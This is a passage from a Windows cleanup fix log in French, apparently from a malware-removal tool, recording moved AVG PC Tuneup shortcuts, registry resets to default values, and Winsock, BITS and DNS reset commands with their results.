successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Disk Wiper.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Duplicate File Finder.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG File Recovery.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG File Shredder.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Internet Optimizer.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Registry Defrag.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Rescue Center.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Service Manager.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Startup Manager.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG System Information.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Task Manager.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Track Eraser.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Tweak Manager.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011\Utilities\AVG Uninstall Manager.lnk => moved successfully C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC Tuneup 2011 => moved successfully "C:\Program Files (x86)\AVG\AVG PC Tuneup 2011" => not found ========= REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction" /V Enable /T REG_SZ /D n /f ========= L'op‚ration a r‚ussi. ========= End of Reg: ========= ========= REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction" /V OptimizeComplete /T REG_SZ /D no /f ========= L'op‚ration a r‚ussi. ========= End of Reg: ========= ========= REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V PowerdownAfterShutdown /T REG_SZ /D 1 /f ========= L'op‚ration a r‚ussi. ========= End of Reg: ========= ========= REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /V ClearPageFileAtShutdown /T REG_DWORD /D 0 /f ========= L'op‚ration a r‚ussi. ========= End of Reg: ========= ========= REG ADD "HKEY_CURRENT_USER\Control Panel\Desktop" /V MenuShowDelay /T REG_SZ /D 400 /f ========= L'op‚ration a r‚ussi. ========= End of Reg: ========= ========= REG ADD "HKEY_CURRENT_USER\Control Panel\Desktop" /V WaitToKillAppTimeout /T REG_SZ /D 1200 /f ========= L'op‚ration a r‚ussi. ========= End of Reg: ========= ========= REG ADD "HKEY_CURRENT_USER\Control Panel\Desktop" /V HungAppTimeout /T REG_SZ /D 1200 /f ========= L'op‚ration a r‚ussi. ========= End of Reg: ========= ========= REG ADD "HKEY_CURRENT_USER\Control Panel\Desktop" /V AutoEndTasks /T REG_SZ /D 1 /f ========= L'op‚ration a r‚ussi. ========= End of Reg: ========= ========= REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control" /V WaitToKillServiceTimeout /T REG_SZ /D 1200 /f ========= L'op‚ration a r‚ussi. ========= End of Reg: ========= ========= REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /V EnableLUA /T REG_DWORD /D 1 /f ========= L'op‚ration a r‚ussi. ========= End of Reg: ========= ========= bitsadmin /reset ========= 'bitsadmin' n'est pas reconnu en tant que commande interne ou externe, un programme ex‚cutable ou un fichier de commandes. ========= End of CMD: ========= ========= netsh winsock reset ========= Le catalogue Winsock a ‚t‚ r‚initialis‚ correctement. Vous devez red‚marrer l'ordinateur afin de finaliser la r‚initialisation. ========= End of CMD: ========= ========= ipconfig /flushdns ========= Configuration IP de Windows Impossible de vider le cache de r‚solution DNS : La fonction a ‚chou‚ lors de l'ex‚cution. ========= End of CMD: ========= EmptyTemp: => Error: This directive works only outside recovery mode. ==== End of Fixlog 21:08:09 ====